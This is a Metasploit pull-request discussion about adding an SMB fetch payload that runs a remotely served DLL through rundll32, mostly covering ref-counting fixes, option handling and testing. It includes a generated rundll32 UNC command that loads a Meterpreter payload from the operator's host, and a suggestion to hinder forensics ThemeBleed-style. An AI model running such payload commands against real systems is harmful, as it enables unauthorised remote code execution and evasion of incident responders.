Add an SMB-based fetch payload for Windows #18664
Conversation
@@ -10,7 +10,11 @@ def initialize(*args)
   end

   def cleanup_handler
-    cleanup_http_fetch_service(@fetch_service, @delete_resource)
+    if @fetch_service
This change in isolation looks good to me, but the cleanup_http_fetch_service implementation that gets called looks very odd to me:
def cleanup_http_fetch_service(fetch_service, delete_resource)
  unless fetch_service.nil?
    escaped_srvuri = ('/' + srvuri).gsub('//', '/')
    if fetch_service.resources.include?(escaped_srvuri) && delete_resource
      fetch_service.remove_resource(escaped_srvuri)
    end
    fetch_service.deref
    if fetch_service.resources.empty?
      # if we don't call deref, we cannot start another httpserver
      # this is a reimplementation of the cleanup_service method
      # in Exploit::Remote::SocketServer
      temp_service = fetch_service
      fetch_service = nil
      temp_service.cleanup
      temp_service.deref
    end
  end
end
I don't think there should be two calls to deref in a single cleanup call; is there another issue hidden here, maybe? 🤔
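To illustrate the concern, here is a minimal, hypothetical refcount sketch (not the rex-core code; class and method names are illustrative): a service starts at one reference, so the two deref calls in the cleanup path drive the count to -1, with cleanup firing on the first call rather than the second.

```ruby
# Hypothetical miniature of a Rex-style reference counter.
class CountedService
  attr_reader :refs, :cleanups

  def initialize
    @refs = 1           # refinit starts every service at one reference
    @cleanups = 0
    @mutex = Mutex.new
  end

  def ref
    @mutex.synchronize { @refs += 1 }
    self
  end

  # Mirrors the Rex::Ref#deref contract: cleanup runs when the count hits zero.
  def deref
    @mutex.synchronize do
      @refs -= 1
      if @refs.zero?
        @cleanups += 1  # stand-in for the real cleanup work
        true
      else
        false
      end
    end
  end
end

svc = CountedService.new
svc.deref  # 1 -> 0, cleanup runs here
svc.deref  # 0 -> -1, the second deref from the cleanup path
svc.refs   # => -1
```

The second call returns false and does no cleanup; it only pushes the count negative, which is the smell being pointed out.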
Yeah, the ref counting is wrong here; verified with some extra logging added to rex-core:
diff --git a/lib/rex/sync/ref.rb b/lib/rex/sync/ref.rb
index 50b0146..9087747 100644
--- a/lib/rex/sync/ref.rb
+++ b/lib/rex/sync/ref.rb
@@ -45,6 +45,8 @@ module Ref
@_references = 1
@_references_mutex = Mutex.new
+ $stderr.puts "[ref-count] calling refinit: #{caller}, total references: current #{@_references}"
+
self
end
@@ -54,6 +56,7 @@ module Ref
def ref
@_references_mutex.synchronize {
@_references += 1
+ $stderr.puts "[ref-count] creating ref: #{caller}, total references: current #{@_references}"
}
self
@@ -65,11 +68,15 @@ module Ref
#
def deref
@_references_mutex.synchronize {
- if ((@_references -= 1) == 0)
+ @_references -= 1
+ $stderr.puts "[ref-count] creating deref: #{caller}, total references: #{@_references}"
+ if (@_references == 0)
+ $stderr.puts "[ref-count] calling cleanup"
cleanup
true
else
+ $stderr.puts "[ref-count] no cleanup required"
false
end
}
We end up with a refcount of -1, as far as I can see from a quick glance.
Yeah, that looks like an issue, but I copied it over from @bwatters-r7's original implementation here. I tested it again by removing everything after the fetch_service.deref line and confirmed I can start two services, then tear them down individually, and the HTTP server will remain until the last handler job is killed, which is the expected behavior. Based on that, I don't think the explicit call to #cleanup is necessary; it looks like #deref handles it automatically.
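A sketch of the simplified teardown described above, using a stub in place of the real Rex fetch service (the stub's API and the extra srvuri parameter are illustrative, not the module's actual signature): removing the resource and issuing a single deref is enough, because deref performs cleanup itself once the count reaches zero.

```ruby
# Stub standing in for the real Rex fetch service; illustrative only.
class StubFetchService
  attr_reader :resources

  def initialize
    @refs = 1
    @resources = []
    @stopped = false
  end

  def add_resource(uri)
    @resources << uri
  end

  def remove_resource(uri)
    @resources.delete(uri)
  end

  def ref
    @refs += 1
  end

  def stopped?
    @stopped
  end

  def deref
    @refs -= 1
    @stopped = true if @refs.zero? # cleanup happens inside deref
  end
end

# Simplified teardown: no explicit #cleanup and no second #deref.
def cleanup_http_fetch_service(fetch_service, srvuri, delete_resource)
  return if fetch_service.nil?

  escaped_srvuri = ('/' + srvuri).gsub('//', '/')
  if delete_resource && fetch_service.resources.include?(escaped_srvuri)
    fetch_service.remove_resource(escaped_srvuri)
  end
  fetch_service.deref
end

svc = StubFetchService.new
svc.add_resource('/payload.dll')
cleanup_http_fetch_service(svc, 'payload.dll', true)
svc.stopped?  # => true
```

If another handler still holds a reference (it called ref earlier), the same single deref leaves the service running until that last holder derefs, matching the behavior described above.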
I always thought this was wonky; I never understood why we needed to deref until empty, then deref again. I know that in theory it should call its own cleanup when the refcount is 0, but that expectation did not match reality.
I will go back and take a look, but I know that I could not start a second service without the second deref, and I am pretty sure the service was never stopped. I spent a long time trying to figure out what was going on and cursed the rex-sync library repeatedly.
@bwatters-r7 are we alright to keep the proposed changes or are you still looking into why it needed to be done this way?
I started looking at the old commits and was trying to remember what tests I ran that made me think this was an issue. It is on my list for today to see if I can figure it out.
I found the conversation where I think I was working on this. I was unable to recreate the issue when I removed:
if fetch_service.resources.empty?
# if we don't call deref, we cannot start another httpserver
# this is a reimplementation of the cleanup_service method
# in Exploit::Remote::SocketServer
temp_service = fetch_service
fetch_service = nil
temp_service.cleanup
temp_service.deref
end
That said, I also can no longer use the _servicemanager
command; it was hidden behind a feature flag that no longer exists, and I cannot find a built-in command that matches. It is also late, so I might be misremembering or completely missing it. I'll look again tomorrow, but this looks like an overcorrection on my part right now.
Noticed this crash when poking around on the PR briefly for the HTTP service changes. I don't think it's related to this PR specifically, but thought I'd write it down:
Force-pushed d2045aa to 17b034b
You're right, this was an existing issue, but I did fix it in 17b034b. I opted to use the pattern I saw in the reverse TCP stagers, which was to default to '127.127.127.127' when the host was not defined. The host should be defined, though, because LHOST is a required option. I updated the definition of
super
register_options(
  [
    Msf::OptString.new('FETCH_FILENAME', [ true, 'Payload file name to fetch; cannot contain spaces or slashes.', 'test.dll'], regex: /^[^\s\/\\]*$/),
To make sure that this is standardized between venom/framework and still has some amount of pseudo-randomness, we could take the same approach we did with the URI:
def default_srvuri
Admittedly, I am not sure if it is worth it; a sig on test.dll
would be a nightmare.
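One way the suggested default_srvuri-style approach could look; the method name and seed parameter here are hypothetical illustrations, not the framework's API. The point is a deterministic, per-seed filename: msfvenom and framework agree as long as they share the seed, while a static, signature-friendly name like test.dll is avoided.

```ruby
require 'digest'

# Hypothetical sketch: derive a stable pseudo-random default filename
# from a seed, so the same install always generates the same name but
# no two installs share a signature-friendly constant.
def default_fetch_filename(seed)
  # Keep 8 hex characters of the digest as the basename.
  Digest::SHA256.hexdigest(seed)[0, 8] + '.dll'
end

default_fetch_filename('per-install-seed')  # stable for a given seed
```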
Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']),
# FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
Not a blocker; this UX is a bit weird for me, having to specify FETCH_SRVHOST instead of following the normal LHOST convention 😄
msf6 payload(cmd/windows/smb/x64/messagebox) > generate -f raw lhost=192.168.123.1
[-] Payload generation failed: One or more options failed to validate: FETCH_SRVHOST.
This makes sense to me? If there is an LHOST value (reverse port-enabled payloads), FETCH_SRVHOST is optional, and if it is blank we use the LHOST value. If there is no LHOST value, we require the FETCH_SRVHOST value. There are a lot of situations where we would like the LHOST and FETCH_SRVHOST values to be different, though.
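The fallback behavior described above can be sketched as follows; this is a simplified illustration with a hypothetical helper name, not the module's actual resolution code.

```ruby
# Simplified illustration: FETCH_SRVHOST is only required when the
# payload has no LHOST option, and a blank FETCH_SRVHOST falls back
# to LHOST.
def resolve_fetch_srvhost(datastore)
  srvhost = datastore['FETCH_SRVHOST']
  return srvhost unless srvhost.nil? || srvhost.empty?

  # Reverse payloads always carry an LHOST, which makes
  # FETCH_SRVHOST optional for them.
  datastore['LHOST']
end

resolve_fetch_srvhost('LHOST' => '10.5.135.201')  # => "10.5.135.201"
```

An explicitly set FETCH_SRVHOST always wins, which covers the cases where the serving host and the callback host need to differ.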
msf6 payload(cmd/windows/smb/x64/meterpreter_reverse_tcp) > show options
Module options (payload/cmd/windows/smb/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
FETCH_FILENAME test.dll yes Payload file name to fetch; cannot contain spaces or slashes.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
View the full module info with the info, or info -d command.
msf6 payload(cmd/windows/smb/x64/meterpreter_reverse_tcp) > generate -f raw
rundll32 \\10.5.135.201\XgxUu-11BP4H1Dy-9LxxVA\test.dll,0
This works great for me, but sometimes when I swap around and stop/start SMB modules, it stops working. I can see the job is running fine:
And from the logs it looks like the disk share is added successfully; then it just doesn't work:
If I close and reopen msfconsole, then it starts working again:
Is there inbuilt logic to ignore additional incoming requests from the same target, similar to the smb relay logic?
@adfoster-r7 Do you have a particular order and/or modules you ran to trigger that condition, or is it sporadic?
In that most recent dump, I just started it. I see Brendan's assigned himself now, so I can see if he bumps into that issue or not too.
@adfoster-r7 I was unable to reproduce any issues by following those steps. Testing output:
)

log_device = LogDevice::Framework.new(framework)
logger = Logger.new(self, log_device)
What are your thoughts on following the pattern that the smb_relay module uses?
i.e. VERBOSE will log to stdout, which is useful for debugging things without needing tail -f on the framework log:
def smb_logger
log_device = datastore['VERBOSE'] ? Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Module.new(self) : Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Framework.new(framework)
Msf::Exploit::Remote::SMB::LogAdapter::Logger.new(self, log_device)
end
Added in commit 209f778. I realized, though, that once the server instance is shared (because #18680 has landed), only the VERBOSE setting of the original module will be used. That could cause some confusion when messages don't show up because the first module that started the SMB server isn't configured the same way. This discussion may be better over in the other PR, but to alleviate that confusion, we could take the logger's configuration into the .hardcore_alias method; however, that would mean every SMB module would need to use the same VERBOSE setting, which could be worse.
I think the best solution could be something more general that sends the framework logs to stdout or stderr, but that's outside the scope of this project.
  cleanup_handler
  fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{Rex::Socket.to_authority(srvhost, srvport)}\n#{e}")
end
This is absolutely not blocking, but reading this, it strikes me we could add a layer of sneaky by implementing the trick from ThemeBleed: this should open the file for execution, but if someone saw this UNC path and wanted to do forensics, they'd request it, and that would open it for read. If we served a separate file for read versus execute like ThemeBleed, it would make forensics harder. Not sure if it is worth the additional work and complexity, but it would be a sneaky move.
I have some minor odd feelings about the default assumption that we'll always use rundll32 and have Windows query it as a diskless implementation. Yes, Windows systems cannot use any port other than 445, but if we chose to allow downloading and running an exe using curl, I think we could use a port other than 445? The same applies if we wanted to let Linux pull down a file through SMB on a random port. What are your thoughts on adding
TIL! Thanks, Microsoft.
Force-pushed 36bef19 to f484a81
* Build the HTTPS server on top of HTTP instead of the other way around
* Set the fetch service to nil after it has been cleaned up
* Don't capitalize the H in the word handler
* Check if the fetch_service is truthy before cleaning it up
* Remove the unused FetchServerName datastore option
* Fixup the description text
* Don't allow slashes in fetch file names
* Also add the #fetch_bindnetloc method

Fix a problem in fetch/tftp.rb
The SRVPORT datastore option is registered by the Remote::SMB::Server mixin so including it here is redundant.
Use #srvport instead of the datastore and pull in upstream changes for the metasploit-credential gem to enable use within payloads.
Fix instances where the `info` command would raise an exception while generating the payload to calculate its length.
Force-pushed f484a81 to 44916e6
I came across an issue with the payload/cmd/windows/smb/x64/meterpreter/reverse_tcp module.
It doesn't occur with a bind payload. Also, I'm not sure if it is expected, but I noticed the services are still running even after the module finished:
I checked with
@cdelafuente-r7 I was able to reproduce the issue you ran into and fixed it in 7e59380. The issue was related to the
Force-pushed 4009252 to 7e59380
Thanks for updating this @zeroSteiner ! Everything looks good to me now. I tested against Windows Server 2019, Windows 7 and Windows 11 and verified I got a session. I'll go ahead and land it.
Release Notes

This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.
Additionally closes #18664
This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically. This is basically the same as what the exploit/windows/smb/smb_delivery module does, but as a payload, meaning that the generated command can be automatically incorporated into exploits for the Windows platform that have an ARCH_CMD target.

Also included are some changes in commit 0fd5517 that fix up some things I noticed while figuring out how to implement a new fetch server. Overall, they aim to make things behave more consistently and fix up some text strings that are displayed to the user.